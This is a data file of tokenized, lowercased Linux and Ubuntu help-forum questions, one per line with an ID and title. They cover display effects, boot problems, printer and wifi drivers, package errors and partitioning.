474688	trouble enabling kde desktop effects	i 'm having a few issues with the kde desktop effects and i was wondering if someone might be able to shine some light on it . i 'm using a netbook with intel gma 3600/3650 integrated graphics ( i 'm open to the idea that this card might be the problem ; unfortunately i do n't know enough about opengl to make that decision for myself ) . for reference : me @ mycomputer : ~ $ lspci -v | grep vga 00:02.0 vga compatible controller : intel corporation atom processor d2xxx/n2xxx integrated graphics controller ( rev 0b ) ( prog-if 00 [ vga controller ] ) me @ mycomputer : ~ $ glxinfo | grep opengl opengl vendor string : vmware , inc. opengl renderer string : gallium 0.4 on llvmpipe ( llvm 3.4 , 128 bits ) opengl version string : 2.1 mesa 10.1.0 opengl shading language version string : 1.30 opengl extensions : the problem : when i change the compositing type from xrender to opengl , if i restart it goes back to xrender . when i enable certain ( glitzier ) effects like the cover switcher , wobbly windows or desktop cube , none of those effects seem to go through . however fading between desktops and many others do . what might be going on here ?
474689	ubuntu wo n't show launcher or the taskbar	i 'm new to ubuntu , just downloaded 2 days ago , my problem is after installing it on my system the first time , when i shut down & relogin , i see neither the taskbar on the left side of the screen nor the stuff on the top right corner of the screen , i tried reinstalling the os but after the first login after install , both those things disappear again . i 'm using ubuntu 14.04 , please help & thankyou .
474693	ubuntu stuck on purple loading screen , ctrl alt f2 reveals a sda error ?	i 've recently built a custom computer and have decided to install the latest release of ubuntu on it . however , i 've run into some problems . when i first boot the system , it brings up a black terminal log of everything , as i expected . then it goes to the purple 'ubuntu loading screen ' with the dots . here 's where the computer gets stuck . no matter how long i wait , my computer remains stuck on this screen . when i alt+ctrl+f2 out , i see this error message cycling through repeatedly . add . sense . unrecovered read error - auto reallocation failed . end_request : i/o error dev sda sector 2048 buffer i/o error on sda1 logical block 0 googling tells me that these are the signs of a dying hard drive . but my hdd is brand spanking new ! a little help here ? i ca n't boot into anything and this is really annoying me .
474695	problems booting windows and ubuntu	i just installed ubuntu on a windows 7 machine and windows will not boot . a few notes : this computer is connected to raid and another hd . i installed ubuntu on the nonraid drive and windows is on the raid . any help is appreciated ! here 's what i get from boot repair : http : //pastebin.com/lyfxm28n
474697	how do i know if i will be able to daisy-chain monitors ? ( connect two monitors to 1 displayport )	i am planning to use surface pro 2 with a dock station as my main computer and i would like to connect two external monitors to it , but the dock station only contains a single displayport socket . however , i see that displayport 1.2 specification , approved in 2009 , allows for daisy-chaining monitors through its multi-stream transport feature . how do i tell if i will be able to use two monitors in daisy-chain mode with my computer ?
474702	permanent changes to xkb-settings ( 12.04 )	i am able to remap caps lock to be an extra ctrl key by running the following : setxkbmap -option `` ctrl : nocaps '' however , as discussed in this question , the changes are not persistent ( also after any lock , such as suspend ) . the first answer is not helpful , because i want the change all the time , not necessarily after i 've opened a terminal ( unless ubuntu sources .bashrc on login ? ) the second answer seems to be what i want , but the referenced org.gnome.desktop.input-sources does n't exist for me . is there somewhere else in dconf editor ( or elsewhere ) to set this so it is permanent ?
474703	ubuntu 14.04 youtube app not working	i installed the youtube app ( unity-webapps-youtube ) from ubuntu software center . but it tells me it can not play any videos because of a missing flash player . flash plays fine in either firefox or google chrome but not in the app . is there any workaround ? something like telling the app to use html5 instead of flash for example ?
474706	ubuntu 14.04 : lts , hplip loses usb connection to hp laserjet	this is my first post , so please let me know if i have inadvertanly broken any rules . problem there seems to be a problem with hplip and usb connections in ubuntu 14.04lts . after upgrading i managed to get the printing to work but today it has broken . initial issue ( solved ) after upgrading to unbutntu 14.04 lts my printer lhp laserjet 1018 stopped printing ( code=12 ) looking through the forumsthere are several issues with printitng and hplip so i was able to troubleshoot this . the steps i took were : reran hpdoctor ran hp-check un-installed and installed the latest version of hplip ( 3.14.4 ) checked the usb connections lsusb and lsusb-v re-ran hpcheck removed the printer from hplip re-ran hpcheck manually configued hplip to the printer hp-setup-g < xxx : yyy > and this worked hplip was able to see the printer in the usb , test page printed and was happily working for a few weeks . current issue printer not working however today my wife complains the printer is not working and checking see that although hplip has the same error code and did not seem to be able to see the printer although running lsusb could see the printer . initially thought this may be due to usb given a new bus/device after being turned on and off and went to repeat the steps above at the moment still seeing an error in that the hplip is complaining that it can not see the device **error : device not found . please make sure your printer is properly connected and powered-on . ** current observations lsusb output # # bus 002 device 007 : id 03f0:4117 hewlett-packard laserjet 1018 sudo hp-check output * > `` duan @ duan-lenovo-b550 : ~ $ sudo hp-check [ sudo ] password for duan : saving output in log file : /home/duan/hp-check.log hp linux imaging and printing system ( ver . 3.14.4 ) dependency/version check utility ver . 15.1 copyright ( c ) 2001-13 hewlett-packard development company , lp this software comes with absolutely no warranty . this is free software , and you are welcome to distribute it under certain conditions . see copying file for more details . note : hp-check can be run in three modes : 1 . compile-time check mode ( -c or -- compile ) : use this mode before compiling the hplip supplied tarball ( .tar.gz or .run ) to determine if the proper dependencies are installed to successfully compile hplip . run-time check mode ( -r or -- run ) : use this mode to determine if a distro supplied package ( .deb , .rpm , etc ) or an already built hplip supplied tarball has the proper dependencies installed to successfully run . both compile- and run-time check mode ( -b or -- both ) ( default ) : this mode will check both of the above cases ( both compile- and run-time dependencies ) . full output output of hp-setup -g 002:007 window box `` device not found please make sure your printer is properly connected and powered on '' duan @ duan-lenovo-b550 : ~ $ sudo hp-setup -g 002:007 [ sudo ] password for duan : > hp linux imaging and printing system ( ver . 3.14.4 ) printer/fax setup > utility ver . 9.0 > > copyright ( c ) 2001-13 hewlett-packard development company , lp this > software comes with absolutely no warranty . this is free software , and > you are welcome to distribute it under certain conditions . see copying > file for more details . > > hp-setup [ 18461 ] : debug : param=002:007 hp-setup [ 18461 ] : debug : > selected_device_name=none fontconfig error : > `` /etc/fonts/conf.d/65-khmer.conf '' , line 14 : out of memory fontconfig > error : `` /etc/fonts/conf.d/65-khmer.conf '' , line 23 : out of memory > fontconfig error : `` /etc/fonts/conf.d/65-khmer.conf '' , line 32 : out of > memory hp-setup [ 18461 ] : debug : sys.argv= [ '/usr/bin/hp-setup ' , '-g ' , > '002:007 ' ] printer_name=none param=002:007 jd_port=1 device_uri=none > remove=false searching for device ... hp-setup [ 18461 ] : debug : trying > usb with bus=002 dev=007 ... hp-setup [ 18461 ] : debug : not found . > hp-setup [ 18461 ] : debug : trying serial number 002:007 hp-setup [ 18461 ] : > debug : probing bus : usb hp-setup [ 18461 ] : debug : probing bus : par > error : device not found . please make sure your printer is properly > connected and powered-on . hp-setup [ 18461 ] : debug : starting gui loop . .. usb lead works with the windows 7 laptop printer works with windows 7 laptop questions is this a bug with hplip or an issue with laptop/printer ? supplementary question if it is a bug what information is needed and where should it be sent ? any suggestions on how to get the printer to work correctly with ubuntu 14.04lts/hplip 13.4.3 so that it stays working ?
474708	does pip overwrite packages installed by apt-get ?	what happens if i accidentally pip install a package that i already installed using apt-get beforehand ? do i simply get to use the latest version ( i.e . probably the one i installed using pip ) ? what happens the other way round ? note : i do not use python in a virtual environment ( simply because i do n't know why i should -- i use python as a data analysis tool and mostly try to use the latest version of everything ) .
474711	i lost thunderbird from the launcher and ca n't get it back	i am new to ubuntu , am not very tech savey , and a couple of days ago i installed kontack on my ubuntu . about half way through the install my thunderbird icon disappeared from the launcher on the desktop . i 've been searching for where it went and how to restore it to my desktop sdince then with no luck . can you help me find my thunderbird program and re-set it on my launcher as my default email program ? thanks
474715	nautilus copy/paste suddenly stop working , how to workaround ? qdbus ?	i use ubuntu 14.04 . as copy/paste for no reason suddenly fails , since nautilus on ubuntu 12.10 , i am looking for a workaround . the workaround can be any trick you came by . i have several ( 10+ ) tabs opened and there is no way to close and open nautilus with all them back opened ? if there is , this would be a workaround ! i , at least , could find no way even with qdbus ( may be i dont know how to use it very well ) . in case you know what causes this problem , i would like to know too , but not required . i was thinking , if i could collect all tab locations thru , may be , qdbus , i could create a script to re-open them on a new nautilus window ; but i cant find a way to do that ...
474716	how do i use a second keyboard and mouse - when running a seperate xserver on the same graphics card	i have 2x mice , 2x keybard , 2x monitor 1x graphics . can i make it a second computer ? ( for no reason at all ) -- or -- would it be easier with a second vga : as i do have a decent extra ati card ( 7750 series ) however ... i am currently using nvidia
474717	mouse hits activitys corder w/ [ nvidia gpu ] running x:0.0 and x:0.1	how to fix ? gnome is my favorite , i dont want to change it . but trying to hit the back button is hell . it keeps jumping to the other screen and procing minimize/activities . i need the seperate x. i have an extra ati card .
474718	asus vivo pc and ubuntu installation problem	bought a new pc couple of days ago , asus vivo pc v60 . downloaded 14.04 lts 64bit version , after installation , it goes to a black screen with a bunch of error messages , and fatal error and lots os random letters and numbers.. my old dual core pc runs ubuntu 14.04 just fine.. what did a do wrong , should i try the 32bit version ? thank you https : //www.dropbox.com/s/jvm5ichp2iiu9ma/2014-07-03 % 2023.22.26.jpg image link added
474722	how do i remove lxde ?	i tried lxde and i really do n't like it so i would like to get rid of it . i installed it by typing : sudo apt-get install lxde and tried to remove it by typing sudo apt-get purge lxde & & sudo apt-get autoremove but the lxde option is still in lightdm 's desktop menu . can anybody tell me how to remove it from lightdm 's menu ?
474724	audacious renamed music list unable to play	i use audacious as my music player in my ubuntu 14.04 . its a nice music player . but it has a problem . i used to play songs most of the time and i rename each song list . i thought am saving each song list every time i rename it because the renamed song lists was shown every time i open audacious . but i think there is some problem with this . when i try to play a renamed music list , a window named `` error '' appears with a lot of information ( i think , error information ) and none of the songs in the list plays . so why this error occurs and how can i solve it ?
474726	ethernet-over-powerline with ubuntu	is there any reason this network solution would n't work with ubuntu ( 12.04 ) ? trendnet tpl-406e2k or any other ethernet-over-powerline device for that matter ? if it 's indistinguishable from a regular ethernet connection to a router , then i do n't see why not ? ( i know there is mention of a driver cd for windows , but several reviewers seemed to say it worked right out of the box . ) the reviews are outstanding , and it looks like a great network solution . thanks !
474727	kwin [ ? ] : force custom manual titles for individual windows ?	i see under the `` edit window specific settings '' thing that kwin provides , that you can match windows by their titles ( exact , regex , or substring ) , and then use that match to apply certain custom settings ... but i ca n't find a way to take an individual window and force it to have and keep a custom title . how can i do this ? if i could only do this manual title setting thing , then i could use it with the `` present windows '' desktop effect to get a workflow that would work really well for me ... . ( for a concrete idea of what i 'm trying to do and why : i have like a couple dozen text editor windows open ( sublime 2 , which by default gives a title to its window from the full path/file name of the file in the active tab ) . they each have a dozen to a few dozen files open in them , in tabs . i want to force each window to have a particular name , regardless of which tab in the window has focus . i want to force them to have names like : 12-noun 13-verb 14-adjective 15-pronoun 16-adverb 17-article 18-preposition 19-conjunction 32-sentypes 33-constituents 34-phrases 35-predicates 36-orderargs 37-clauses 38-negation ( i have a p wide vertical taskbar , so all the window titles are visible there , but of course they 're all `` ~/dropbox/blahblahrestofthelongpath ... ... '' ) see , i 'm rewriting and reorganizing a p much exhaustive german reference grammar . that 's why i need such a ridiculously huge schmozzle of windows and tabs open at once , and a weird way of organizing and moving between them ... . )
474728	how do i remove my windows 7 setup from a windows/ubuntu dual-boot ?	previously my os was window 7 and some day it began to show problems with booting and finally it did n't boot at all . i tried to repair it but it did n't get repaired . then i installed ubuntu 14.04 lts alongside windows and am impressed much by ubuntu . so i want to remove all my windows files . i searched google to know how to do it and i found os-uninstaller . i have some doubts before proceeding with os-uninstaller - i need to keep my photos , songs , movies and personal files in my system even if windows is removed . normally windows files are installed in the c drive . my personal files are not in the c drive . so will removing windows files affect my personal files ? did the os-uninstaller affect ubuntu anyway ? please note that i want to remove only the windows installation files ( the files added to my system by windows during its installation ) . i do n't want to change the ntfs partition to any other format since there is a probability that i will install newer version of windows later .
474729	problems with chromium web browser	i have a ubuntu certified computer with ubuntu 12.04 lts pre-installed on it and ever since i got the computer i have had some really annoying problems with the web browser ( chromium ) when ever i would go to www.google.com and enter a search item and press the enter key on my keyboard the screen would automatically turn off . ( i made sure that i was in the ubuntu 2d mode ) the only thing that i can think of is maybe the computer can not communicate with the monitor . i have a dell 17 '' desktop monitor from maybe 2000 or 2006 not sure . if anyone has any tips on what i can do to stop this problem please let me know , thank you very much . : - )
474735	can not delete user - running '/usr/sbin/userdel ' failed : child process exited with code 16	when i tried to delete a user using the user accounts window under settings , i get the following error message : running '/usr/sbin/userdel ' failed : child process exited with code 16 how can i delete this user ?
474737	attempted to dual boot with windows and now can only run ubuntu	very recently , i decided to attempt to dual boot ubuntu with my already installed windows 8 . everything worked perfectly , i manually set up disk partitions ( this is all on 1 hard drive ) , and it loaded up ubuntu fine . however , now when i try to load up my computer it only has 2 options in the boot menu and both just load up windows ( both were something related to hard disk ) . i also can only boot from legacy hard disk things . ( i already only was able to aside from my usb that i installed windows from ) the windows files are still accessible from ubuntu , but i can not just load windows . there is no option to . i also do n't have the 2 buttons for each operating system i was expecting . i can only select the thing to load from bios . so , my question is , how do i load the windows partition on my hard drive ? i 'm sorry if i 'm a bit clueless i am just new to both linux and dual-booting .
474739	ntfs signature is missing	so i got a new secondary hard drive caddy and formatted it to ntfs . i forgot to partition the drive after formatting , i rebooted and now i ca n't access the drive that has around 400gb of data because the ntfs signature is missing . `` error mounting ... ntfs signature is missing . failed to mount '/dev/sdb2 ' : invalid argument the device '/dev/sdb2 ' does n't seem to have a valid ntfs . maybe the wrong device is used ? or the whole disk instead of a partition ( e.g . /dev/sda , not /dev/sda1 ) ? or the other way around ? '' says the same thing for sdb1 . but i think the sdb2 has most , if not all of the copied data . how do i retrieve my data back ? i read somewhere i can install ntfs-progs and it will fix the issue . here
474742	help with held broken packages	please help i get the following message below after trying to install synaptic ... . perkins @ perkins-hp-2000-notebook-pc : ~ $ sudo apt-get install synaptic reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : synaptic : depends : libapt-pkg4.12 ( > = 0.9.11 ) but 0.8.16~exp12ubuntu10.16 is to be installed depends : libpango-1.0-0 ( > = 1.14.0 ) but it is not installable recommends : rarian-compat but it is not going to be installed e : unable to correct problems , you have held broken packages .
474743	ubuntu 14.04 d-link n300	i have just purchased a d-link n300 wireless usb adapter . when it is plugged in it does connect to my wireless router but seems to have trouble connecting to most sites with firefox . i have got to this point using the stick , so obviously it is working to some degree , but am not sure what else i should be doing to complete the installation . any help would be appreciated . thanks . david
474744	updating usb boot files ?	if one boots a live session , does an update to the live session and then create a usb boot drive , would it contain the updates ?
474749	calibre library error no such file or directory	calibre library 1.39.0 amd 6x 16g ram ssd 128g main drive ext4 1tb 2nd format ntfs ubuntu 14.04 with lubuntu gui . everything works great import , export , web server , connecting to all devices and reading from all my devices but the computer from the main program i get this error when ever i click on the book cover : /mnt/1.0tb/calibre % 20library/astrology % 20guide % 20for % 20beginners/astrology % 20guide % 20for % 20beginners % 20- % 20unknown % 20 ( 6 ) : no such file or directory i can see the file is there , the directory is there . anybody else having this problem ?
474750	trying to boot ubuntu on mac from external hard drive . disk is no longer recognized by computer	i followed the instructions on the ubuntu website found here . after the final step in terminal , i got a pop-up on my desktop saying `` the disk you inserted was not readable by this computer . '' i shut off my computer and tried booting from the hard drive , but only the internal hard drive showed up as an option for boot . any idea why this happened ? what can i do to fix it ? i 'm running 10.6.8 on my macbook , if that helps .
474755	how do i administer , test and fix my rtl8192ce wifi card on the command line ? it ca n't connect to router and external sites	i 've been using a realtek rtl8192ce wlan card on ubuntu 10.04 and ubuntu 14.04 . previously the built-in kernel module 'rtl8192ce ' worked fine . there 'd be some occasional , random blips , but i could get online just fine . recently , i set up this computer in a new apartment , but could not connect to the local network at all . based on posts on this site , i found adding a config file for this driver module helped . i added options rtl8192ce ips=0 fwlps=0 to the file /etc/modprobe.d/rtl8192ce.conf these options have to do with powersaving features of the card . i 'm not really sure that 's my problem , but it did do something . now i can connect to the local network , but once connected , i ca n't reach my router 's local ip or ping it or ping external sites . i 've tested this with another router too . i 'd like to be using commands rather than unity desktop gui so i can get some specific error messages or feedback . can someone advise me on or point to a page about turning on and off wlan0 and switching between networks . how can i figure out what 's wrong ? i feel like if i knew the shell commands for controlling networking and knew more about the kernel module in question , especially more options i can set , i could see more clearly what the problem is . thanks in advance . cheers , ryan ps : this is the output of 'lspci -vvnn ' that regards the wifi card : 02:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8192ce pcie wireless network adapter [ 10ec:8178 ] ( rev 01 ) subsystem : asustek computer inc. device [ 1043:84b6 ] control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 16 region 0 : i/o ports at d000 [ size=256 ] region 2 : memory at f0200000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : rtl8192ce update : this is the output of 'sudo lspci -vvnn ' for the wifi card : 02:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8192ce pcie wireless network adapter [ 10ec:8178 ] ( rev 01 ) subsystem : asustek computer inc. device [ 1043:84b6 ] control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 16 region 0 : i/o ports at d000 [ size=256 ] region 2 : memory at f0200000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : [ 40 ] power management version 3 flags : pmeclk- dsi- d1+ d2+ auxcurrent=375ma pme ( d0+ , d1+ , d2+ , d3hot+ , d3cold+ ) status : d0 nosoftrst+ pme-enable- dsel=0 dscale=0 pme- capabilities : [ 50 ] msi : enable- count=1/1 maskable- 64bit+ address : 0000000000000000 data : 0000 capabilities : [ 70 ] express ( v2 ) endpoint , msi 00 devcap : maxpayload 128 bytes , phantfunc 0 , latency l0s < 512ns , l1 < 64us exttag- attnbtn- attnind- pwrind- rbe+ flreset- devctl : report errors : correctable- non-fatal- fatal- unsupported- rlxdord- exttag- phantfunc- auxpwr- nosnoop- maxpayload 128 bytes , maxreadreq 512 bytes devsta : correrr- uncorrerr- fatalerr- unsuppreq- auxpwr+ transpend- lnkcap : port # 0 , speed 2.5gt/s , width x1 , aspm l0s l1 , exit latency l0s < 512ns , l1 < 64us clockpm+ surprise- llactrep- bwnot- lnkctl : aspm disabled ; rcb 64 bytes disabled- commclk+ extsynch- clockpm- autwiddis- bwint- autbwint- lnksta : speed 2.5gt/s , width x1 , trerr- train- slotclk+ dlactive- bwmgmt- abwmgmt- devcap2 : completion timeout : not supported , timeoutdis+ , ltr- , obff not supported devctl2 : completion timeout : 50us to 50ms , timeoutdis+ , ltr- , obff disabled lnkctl2 : target link speed : 2.5gt/s , entercompliance- speeddis- transmit margin : normal operating range , entermodifiedcompliance- compliancesos- compliance de-emphasis : -6db lnksta2 : current de-emphasis level : -6db , equalizationcomplete- , equalizationphase1- equalizationphase2- , equalizationphase3- , linkequalizationrequest- capabilities : [ 100 v1 ] advanced error reporting uesta : dlp- sdes- tlp- fcp- cmpltto- cmpltabrt- unxcmplt- rxof- malftlp- ecrc- unsupreq- acsviol- uemsk : dlp- sdes- tlp- fcp- cmpltto- cmpltabrt- unxcmplt- rxof- malftlp- ecrc- unsupreq- acsviol- uesvrt : dlp+ sdes+ tlp- fcp+ cmpltto- cmpltabrt- unxcmplt- rxof+ malftlp+ ecrc- unsupreq- acsviol- cesta : rxerr- badtlp- baddllp- rollover- timeout- nonfatalerr- cemsk : rxerr- badtlp- baddllp- rollover- timeout- nonfatalerr+ aercap : first error pointer : 00 , gencap+ cgenen- chkcap+ chken- capabilities : [ 140 v1 ] virtual channel caps : lpevc=0 refclk=100ns patentrybits=1 arb : fixed- wrr32- wrr64- wrr128- ctrl : arbselect=fixed status : inprogress- vc0 : caps : patoffset=00 maxtimeslots=1 rejsnooptrans- arb : fixed- wrr32- wrr64- wrr128- twrr128- wrr256- ctrl : enable+ id=0 arbselect=fixed tc/vc=01 status : negopending- inprogress- capabilities : [ 160 v1 ] device serial number 01-91-81-fe-ff-4c-e0-00 kernel driver in use : rtl8192ce
474759	dpkg : error : unknown option -- add-architecture .	when i try to do sudo dpkg -- add-architecture i386 [ sudo ] password for shailendra : dpkg : error : unknown option -- add-architecture . this happens while installing skype .
474760	e : problem with mergelist	i am using ubuntu 12.04 with all updates installed ( ... until this problem occurred this morning ... ) however , when i tried to to update using the update-manager i got the following error message : e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/www.picalo.org_download_binary_en e : the package lists or status file could not be parsed or opened . what should i do ?
474763	quick swapping multiple monitors with compiz	i 've looked at some of the previous askubuntu questions and did n't see how i might go about doing this . i have two monitors , and soon will have a third . i 'd like to set up keyboard triggers that will swap one of the side monitors to the primary display . displays : [ 1 ] [ 2 ] [ 3 ] lets say i map to keypad-1 and keypad-3 if i press keypad-3 , everything from [ 3 ] would move over to [ 2 ] , and [ 2 ] to [ 3 ] if i press keypad-1 , everything from [ 1 ] would move over to [ 2 ] , and [ 2 ] to [ 3 ] is this possible ? i tried playing around in compizconfig settings manager , and thought maybe the 'viewport switcher ' would do this . it did n't seem to do what i was looking for .
474765	udev .rules file run as local per user ?	i have my code that will run every time udev detects new usb . my code works fine when i run it as a local user . but it fails when i use udev.rules file because it runs my script as root . how can i run `` .rules '' as a local user ? thank you .
474767	installing grass gis 7.0 on ubuntu 14.04	i just switched from windows to ubuntu . now i 'm trying to install grass gis 7.0 ( beta , upcoming stable ) packages on ubuntu 14.04 following the instructions given here . but i 'm getting this error grass70 : depends : grass70-core but it is not going to be installed grass70-gui : depends : grass70-core but it is not going to be installed e : unable to correct problems , you have held broken packages . i wonder how to resolve this issue . any help will be highly appreciated . thanks edited i also tried the following instructions but no luck : sudo add-apt-repository ppa : grass/grass-stable sudo apt-get update sudo apt-get -f install sudo apt-get clean sudo apt-get -f install sudo apt-get install grass70 grass70-gui
474768	cant install ubuntu 14.04 alongside windows7 the only option is : install inside windows 7	hi and thank you for your help i tried install ubuntu 14.04 on my pc and i want to kepp my windows7ultimate but the only option that comes up is install ubuntu inside windows 7 and not alongside and whenever i choose that option it just restarts and ejects the installatoin cd and then boots the windows what can i do to have both of them ?
474772	what do the ' ? ' , ' . ' and '+ ' symbols mean when i run 'who -ah ' ?	what does the plus sign ( + ) , question mark ( ? ) and period ( . ) mean in the idle column when i run who -ah ? i tried google , but the results are all about regular expression and wildcards . edit : i figured out that the period ( . ) means that user is currently active . still unsure of the other two .
474777	remote control of c++ program in ubuntu via https	i have an emulator program written in c++ running on ubuntu 12.04 . there are some settings and options needed for running the program . i need to query and control these options via https from a remote machine/mobile device . i guess there are probably some libraries for the ease of use . i was wondering if someone can help me with that . thanks .
474778	i accidentally removed all the packages containing 3.2 in it , what to do ?	i executed the command sudo apt-get purge remove clang 3.2 a friend told me that because i gave space between 'clang ' and '3.2 ' it uninstalled all the packages that contained 'clang ' and '3.2 ' . when the command got fully executed and i came back from the washroom , the network manager blurted 'this kind of network is not compatible ' . i rebooted and then the arrow keys stopped working in the grub . after 10 seconds of waiting , it gave dead blank screen with only caps lock and num key leds on ( the operating system did n't boot , neither was there any sign of activity from cltr+altr+f1 ) my friend has suggested to make a bootable ubuntu usb and check the log files in the /var/log/apt/term.log file and i 'm downloading the iso . but what after i mount my troubled ubuntu partition ? would i be able to reinstall the packages that got uninstalled from the mounted troubled ubuntu partition from the bootable usb ? please help
474781	`` present windows '' desktop effect : set up two differently-configured versions bound to different hotkeys ? ( ignore minimized windows/not )	i want to set up set up two versions of the `` present windows '' desktop effect ( ie , have each bound to a different hotkey ) , so that one uses the `` ignore minimized windows '' option and the other does n't . the gui configuration does n't seem to provide for such a thing at all . is it possible ? can i manually edit a config file somewhere , somehow ... ?
474785	how to resize unbuntu partition without re isntalling ubuntu	i am using ubuntu 13.10.when i typed df -h , terminal shows the following information filesystem size used avail use % mounted on /dev/sda7 28g 26g 0 100 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 3.9g 4.0k 3.9g 1 % /dev tmpfs 794m 872k 793m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 3.9g 224k 3.9g 1 % /run/shm none 100m 48k 100m 1 % /run/user /dev/sda8 35g 102m 33g 1 % /boot /dev/sda5 69g 18g 51g 27 % /media/user/chinnu /dev/sda2 130g 40g 90g 31 % /media/user/ccca371aca37006e /dev/sda1 70g 50g 21g 72 % /media/user/76e66c99e66c5aff /dev/sda3 130g 12g 118g 10 % /media/user/jinju i hope 28g is the size given to ubuntu . when i took `` about this computer '' menu item.it shows that disk : 66.2 gb but i need some more gbs in ubuntu.is it possible to resize my ubuntu partion without resintalling ?
474786	how to add program icons to the desktop ?	for example , i 'd like a terminal icon on the desktop .
474787	catching runaway processes	occassionally , i run a command that hogs ram and brings my system to a grind . even pressing ctrl-c takes 20 minutes to register , because the system is busy swapping to disk . what solutions are available ? i have some ideas , but do n't know exact solutions : give maximum priority to the window-manager and system processes , while giving a lower priority to all other processes . run a watch-dog process with highest priority that watches for runaway process behaviour . i remember kde used to have such a tool couple of years back . is there a modern ( gnome/unity ) equivalent ?
474788	wifi/ethernet not detecting/connecting on 14.04	i have a dell inspiron 1564 which had ubuntu 12.04 earlier . i was not able to detect wifi/ethernet cable connection so i upgraded it to 14.04 but however i faced the same problem . on installing the linux-firmware-nonfree and running a command on b43 legacy , i was able to detect connections however i was not able to connect to the network . it would keep asking me for the password and authentication but would never be able to connect . i am a new user so any help in this regard would help .
474793	is there any way to upgrade to ubuntu 14.04 through it 's iso ?	i 'm currently using ubuntu 12.04 lts and wanted to upgrade using the 14.04 lts iso . any way ? thanks in advance guys : )
474795	how to run postbooks server in ubuntu ?	i installed post-book accounting software from ubuntu software center in 14.04 lts . also installed post-book demo database and postgresql . but i can not able to run the post-book server . how can i setup user and password for this ?
474798	unable to load nvidia ( bumblebee ) in ubuntu 14.04 ( only nouveau loads )	bumblebee stopped working on my system after upgrading to stable version of ubuntu 14.04 . during installation i get this error rmmod : error : module nouveau is in use setting up bumblebee ( 3.2.1-90~trustyppa1 ) ... selecting 01:00:0 as discrete nvidia card . if this is incorrect , edit the busid line in /etc/bumblebee/xorg.conf.nouveau . bumblebeed start/running , process 11133 processing triggers for initramfs-tools ( 0.103ubuntu4.1 ) ... update-initramfs : generating /boot/initrd.img-3.14.1-031401-generic setting up bumblebee-nvidia ( 3.2.1-90~trustyppa1 ) ... selecting 01:00:0 as discrete nvidia card . if this is incorrect , edit the busid line in /etc/bumblebee/xorg.conf.nvidia rmmod : error : module nouveau is in use bumblebeed start/running , process 18284 it says nouveau is in use . i checked the loaded modules lsmod | grep nouveau nouveau 1097199 1 mxm_wmi 13021 1 nouveau ttm 85115 1 nouveau i2c_algo_bit 13413 2 i915 , nouveau drm_kms_helper 52758 2 i915 , nouveau drm 302817 7 ttm , i915 , drm_kms_helper , nouveau wmi 19177 3 dell_wmi , mxm_wmi , nouveau video 19476 2 i915 , nouveau however , i have nouveau in my blacklist cat /etc/modprobe.d/blacklist.conf | grep nouveau blacklist nouveau blacklist lbm-nouveau alias nouveau off alias lbm-nouveau off my grub is also set to nomodeset cat /etc/default/grub | grep nomodeset grub_cmdline_linux_default= '' nomodeset quiet splash '' my graphics card is nvidia optimus lspci | grep -i vga 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 18 ) 01:00.0 vga compatible controller : nvidia corporation gt218m [ geforce 310m ] ( rev ff ) i 've raised a bug in launchpad : https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/1327598 note : nvidia-prime is working for me ( partially ) . frequent mouse locks . interestingly , bumblebee works perfectly fine on my fedora 20 partition on this same laptop .
474799	how to record sound via headphone in audacity	i have tried recording sound via headphone but i cant get it done not only that but while using skype my voice is not audible to the person whom i am talking but i can hear his voice i think it is the issue of some simple settings so can any one help me to get it done i have connected my headphone into my pc but i cant see it in the list of recordable devices have a look at it is this an issue of incompatible headphones ?
474800	sqliteman can be used to create database in eclipse ?	can i use sqliteman to create database in eclipse ? for android programming .
474801	chrome does not load	hey there i followed the instructions on this page to change permission of all files in a directory in /var http : //superuser.com/questions/47463/how-to-change-permissions-on-all-files-in-a-directory-and-when-new-files-are-ad and now chrome does n't work.. it does n't even start . is there a way to fix this . i 've tried changing the permission of /opt folder but still no use . thanks ! p.s i changed the username and group name to www-data
474808	dpkg : error processing extlinux ( -- configure )	so i was running apt-get autoremove and the output was : dpkg : error processing extlinux ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : extlinux e : sub-process /usr/bin/dpkg returned an error code ( 1 ) is it right ?
474812	partitions not showing while installing ( k ) ubuntu 14.04	im trying to install kubuntu 14.04 along-side windows 7 x64 but there are problems in disk setup section , installer does not show my drives properly as they are , i left drive empty to install kubuntu but this drive does not shown at all and all drives are listed some way un-regular . this is how my drives really are : i want to install kubuntu in my drive d but this is how disk setup is showing my drives : and when i click on manual : i even shrink-ed my drive d to assigning for root , home and swap but there are bot shown to be chosen . where is the problem ? how can i tell installer to assign the drives that i want ?
474813	how to transfer ebooks from kindle account to pc ?	i 've bought an ebook on amazon . i 'd like to be able to read it offline on my pc . also i hate being dependent on any external 'service ' to read a book . so how can i download the ebook , if it is possible at all ?
